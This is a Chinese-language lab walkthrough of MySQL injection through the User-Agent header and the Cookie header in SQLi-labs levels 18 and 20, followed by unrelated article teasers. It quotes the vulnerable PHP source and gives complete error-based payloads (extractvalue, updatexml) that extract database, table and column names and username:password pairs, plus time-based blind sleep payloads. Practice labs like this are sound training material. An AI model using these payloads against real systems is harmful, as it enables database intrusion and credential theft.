MySQL注入中user-agent和cookie存在的注入

uagent注入

1、漏洞成因:

當Web應用程序將用戶提供的User-Agent值未經處理直接拼接到SQL查詢語句時,攻擊者可以通過構造惡意User-Agent值閉合原有SQL語句并注入任意SQL代碼。

2、以less-18為例:

相比前幾關,第18關對于uname和passwd的輸入都進行了過濾源代碼如下:

 ?$uname = check_input($con1, $_POST['uname']);
?$passwd = check_input($con1, $_POST['passwd']);

對于輸入的單引號、雙引號、反斜杠等都進行轉義,無法進行閉合

所以下面的查詢源代碼就不能是注入點

$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";

而在下面源代碼觀察發現,有一個insert語句,也有報錯的前端回顯、對于uagent

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
?
mysqli_query($con1, $insert);
?
echo 'Your User Agent is: ' .$uagent;
echo "</font>";

下面用burpsuite抓包測試注入點(要傳入正確的輸入才可以走到uagent注入點)

抓到包后進入Request模塊對User-Agent:字段添加一個單引號,然后Response,會看到mysql報錯回顯,證明可以嘗試報錯注入

通過在上面的源碼可以分析出uagent字段后面還有$IP和 $uname兩個字段,所以進行帶入字段和注釋看看回顯

在后加上 ',1,1)# 其Response并沒有報錯的回顯的正常回顯

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0 ',1,1)#

接下來進一步可以替換最后一個1來輸入報錯注入的語句

嘗試報錯注入數據庫名:

',1,extractvalue(1,concat(0x7e,database())))# ?

',1,updatexml(1,concat(0x7e,(select database())),1))#

嘗試報錯注入表名:

',1,extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security' limit 0,1))))#

?

',1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1))#

嘗試報錯注入列名:

',1,extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' limit 0,1))))#

',1,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1))#

嘗試報錯注入數據信息:

',1,extractvalue(1,concat(0x7e,(select group_concat(username,':',password) from users))))# ?

',1,updatexml(1,concat(0x7e,(select group_concat(username,':',password) from users)),1))#

cookie、

以less-20為例:

同樣和第18關一樣 對于uname和passwd的輸入都進行了過濾源代碼如下:

$uname = check_input($con1, $_POST['uname']);?? ?$passwd = check_input($con1, $_POST['passwd']);

而對于Request頭部也沒有的回顯和INSERT INTO語句

所以http頭部字段沒有注入點了

而往下看看源代碼會發現有個可疑的注入點:

$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
?$result=mysqli_query($con1, $sql);
?if (!$result)
?{
?die('Issue with your mysql: ' . mysqli_error($con1));
?}

用burpsuite抓包(刷新已經登錄界面)

查看cookie字段

Cookie: uname=Dumb

這里要用到插件HackBar

選擇cookie模塊輸入內容:

http://192.168.44.148:8081/Less-20/index.php ?

uname=Dumb

執行后發現正常回顯

測試注入點

uname=Dumb' 加上單引號執行后發現有報錯信息:Dumb附近的報錯

使用#注入 嘗試閉合

uname=Dumb'# 執行后正常回顯說明注入點就是這里了!

這里可以嘗試報錯注入和盲注

報錯注入嘗試:

uname=Dumb' and updatexml(1,concat(0x7e,(select database())),1)#

時間盲注嘗試:

uname=Dumb' and sleep(3)# ? uname=Dumb' and if(ascii(substring((select database()),1,1))=115,sleep(3),0)#

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/899865.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/899865.shtml
英文地址,請注明出處:http://en.pswp.cn/news/899865.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

【算法數學篇】試除法求約數

題解&#xff1a;試除法求約數 題目傳送門 869. 試除法求約數 一、題目描述 給定 n 個正整數 a?&#xff0c;對于每個整數 a?&#xff0c;按照從小到大的順序輸出它的所有約數。 輸入格式&#xff1a; 第一行包含整數 n接下來 n 行&#xff0c;每行包含一個整數 a? 輸…

《UNIX網絡編程卷1:套接字聯網API》第5章 TCP客戶服務器程序示例

《UNIX網絡編程卷1&#xff1a;套接字聯網API》第5章 TCP客戶/服務器程序示例 5.1 本章目標與示例程序概述 本章通過一個完整的TCP回射&#xff08;Echo&#xff09;客戶/服務器程序&#xff0c;深入解析TCP套接字編程的核心流程與關鍵問題。示例程序的功能為&#xff1a;客戶…

封裝可拖動彈窗(vue jquery引入到html的版本)

vue cli上簡單的功能&#xff0c;在js上太難弄了&#xff0c;這個彈窗功能時常用到&#xff0c;保存起來備用吧 備注&#xff1a;deepseek這個人工智障寫一堆有問題的我&#xff0c;還老服務器繁忙 效果圖&#xff1a; html代碼&#xff1a; <div class"modal-mask&qu…

編譯器工具鏈是什么?

編譯器工具鏈&#xff08;Compiler Toolchain&#xff09; 是一組用于將源代碼轉換為可執行程序的工具和庫的集合。它涵蓋了從源代碼編寫到程序運行的整個構建過程&#xff0c;包括編譯、匯編、鏈接等多個階段。以下是關于編譯器工具鏈的詳細解釋&#xff1a; 一、編譯器工具鏈…

Spring Boot 集成Redis中 RedisTemplate 及相關操作接口對比與方法說明

RedisTemplate 及相關操作接口對比與方法說明 1. RedisTemplate 核心接口與實現類 RedisTemplate 是 Spring Data Redis 的核心模板類&#xff0c;通過 opsFor... 方法返回不同數據類型的操作接口&#xff0c;每個接口對應 Redis 的一種數據結構。以下是主要接口及其實現類&am…

linux內核漏洞檢測利用exp提權

案例一dirtycow&#xff08;CVE-2016-5159&#xff09; 有個前置知識就是 獲取liunx的內核 hostnamectl uname -a 然后這個內核漏洞進行提權的步驟也是和手工win進行提權差不多 也是需要使用輔助工具在本地進行輔助檢測 然后去nomi-sec/PoC-in-GitHub&#xff1a; &#…

重磅 | CertiK《Hack3d:2025第一季度安全報告》(附報告全文鏈接)

CertiK《Hack3d&#xff1a;2025年第一季度安全報告》現已發布&#xff0c;本次報告深入分析了2025年1至3月Web3.0領域的安全狀況。2025年第一季度共發生197起安全事件&#xff0c;總損失約為16.7億美元&#xff0c;環比激增303.4%。其中Bybit事件導致約14.5億美元的損失&#…

經典卷積神經網絡LeNet實現(pytorch版)

LeNet卷積神經網絡 一、理論部分1.1 核心理論1.2 LeNet-5 網絡結構1.3 關鍵細節1.4 后期改進1.6 意義與局限性二、代碼實現2.1 導包2.1 數據加載和處理2.3 網絡構建2.4 訓練和測試函數2.4.1 訓練函數2.4.2 測試函數2.5 訓練和保存模型2.6 模型加載和預測一、理論部分 LeNet是一…

二維碼掃不出?用QR Research工具

一.簡介 簡單來說QR Research就是用來掃二維碼的工具 當二維碼模糊不清&#xff0c;無法用普通方式掃時&#xff0c;就可以用QR Research輕松掃描。QR Research還可以分析變形/破損二維碼&#xff08;修復或提取有效部分&#xff09; 二.下載安裝 QR Research 三.例題 這…

02_使用Docker在服務器上部署Jekins實現項目的自動化部署

02_使用Docker在服務器上部署jenkins實現項目的自動化部署 一、使用docker拉取阿里云容器私有鏡像倉庫內的jenkins鏡像 登錄阿里云Docker Registry $ sudo docker login --usernamewxxxo1xxx registry.cn-shanghai.aliyuncs.com用于登錄的用戶名為阿里云賬號全名&#xff0c…

微服務組件——Eureka組件的安裝與使用指南

文章目錄 一、Eureka Server的安裝與配置1、創建Spring Boot項目2、添加依賴3、配置Eureka Server4、啟用Eureka Server5、啟動并訪問Dashboard 二、Eureka Client的配置&#xff08;服務注冊&#xff09;1、添加客戶端依賴2、配置客戶端3、啟用服務發現4、啟動服務 三、服務發…

探索Doris:日志分析的新寵,是否能取代老牌ES?

在大數據時代&#xff0c;日志存儲與分析對于企業的運營和決策起著至關重要的作用。Elasticsearch&#xff08;簡稱 ES&#xff09;作為一款廣泛應用的開源分布式搜索和分析引擎&#xff0c;長期以來在日志管理領域占據著舉足輕重的地位。然而&#xff0c;隨著技術的不斷發展&a…

學習threejs,使用Texture紋理貼圖,測試repeat重復紋理貼圖

&#x1f468;??? 主頁&#xff1a; gis分享者 &#x1f468;??? 感謝各位大佬 點贊&#x1f44d; 收藏? 留言&#x1f4dd; 加關注?! &#x1f468;??? 收錄于專欄&#xff1a;threejs gis工程師 文章目錄 一、&#x1f340;前言1.1 ??Texture 紋理貼圖1.1.1 ??…

圖像配準及識別

一、圖像配準基礎 圖像配準&#xff0c;聽起來很高大上&#xff0c;其實用大白話來說&#xff0c;就是“讓兩張照片對齊”的技術。想象一下&#xff0c;你有兩張拍得不完全一樣的照片&#xff0c;比如一張是你從正面拍的風景&#xff0c;另一張是從側面拍的同一個地方&#xff…

QT之QML(簡單示例)

需求一&#xff1a;點擊按鈕彈出菜單&#xff0c;并且自定義菜單彈出位置。 mouse.x 和 mouse.y 獲取的是相對于 MouseArea&#xff08;在這個例子中是 Button&#xff09;左上角的局部坐標。如果你想要在鼠標點擊位置顯示 Menu&#xff0c;你需要將這個局部坐標轉換為相對于應…

如何編寫單元測試

一、前言知識 1.開發過程 需求分析->設計->開發->測試->上線 2.測試種類 單元測試(測試模塊編碼)、黑盒測試(測試功能是否滿足需求)、白盒測試(測試程序內部的邏輯結構)、回歸測試(提出的缺陷進行二次驗證)、集成測試(測試主要的業務功能及模塊間的整合性)、系…

LeetCode 解題思路 30(Hot 100)

解題思路&#xff1a; 遞歸參數&#xff1a; 生成括號的對數 n、結果集 result、當前路徑 path、左括號數 open、右括號數 close。遞歸過程&#xff1a; 當當前路徑 path 的長度等于 n * 2 時&#xff0c;說明已經生成有效括號&#xff0c;加入結果集。若左括號數小于 n&…

【Golang】Windows系統鍵鼠空閑監測練習

在本文中&#xff0c;我們將練習如何使用Golang編寫一個簡單的Windows系統空閑時間監測工具。該工具能夠檢測系統的空閑時間&#xff0c;并在達到一定閾值時計數。 功能概述 監控鼠標和鍵盤的空閑事件&#xff0c;每空閑超過50s&#xff0c;觸發次數加一。 該工具具有以下功…

關于React Redux

官網&#xff1a;&#x1f449;詳情一 &#x1f449;詳情二 &#x1f449;關于redux 使用原因&#xff1a;&#x1f449;詳情 /** 2-1、隨著javascript單頁應用程序的發展&#xff0c;需要在代碼中管理更多的狀態&#xff08;包括服務器響應數據、緩存數據、本地創建還未發送…

MySQL和Oracle批量插入SQL差異詳解

文章目錄 MySQL和Oracle批量插入SQL差異詳解1. 基本批量插入語法1.1 MySQL批量插入1.2 Oracle批量插入 2. 帶序列的批量插入2.1 MySQL帶自增ID的批量插入2.2 Oracle帶序列的批量插入 3. 條件批量插入3.1 MySQL條件批量插入3.2 Oracle條件批量插入 MySQL和Oracle批量插入SQL差異…